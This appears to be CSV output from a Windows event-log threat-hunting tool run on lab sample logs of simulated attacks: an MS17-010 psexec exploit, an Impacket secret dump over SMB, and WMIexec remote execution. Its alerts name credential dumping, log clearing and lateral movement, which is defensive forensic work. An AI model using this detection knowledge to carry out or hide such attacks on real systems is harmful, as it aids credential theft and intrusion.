10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.171 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 18:00:09.959 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60285 : LogonID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60232 : LogonID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 50078 : LogonID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.421 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\BTeHLZkJ.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\NMdzZfem.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\BTeHLZkJ.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\NMdzZfem.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:19.875 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:20.003 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.560 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.696 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 20:32:00.171 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63558 : LogonID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63534 : LogonID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 50896 : LogonID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 56740 : LogonID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.483 +09:00,fs03vuln.offsec.lan,4674,low,Lateral Movement Indicator ConDrv,,rules/sigma/builtin/security/win_lateral_movement_condrv.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.546 +09:00,fs03vuln.offsec.lan,4674,low,Lateral Movement Indicator ConDrv,,rules/sigma/builtin/security/win_lateral_movement_condrv.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63564 : LogonID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 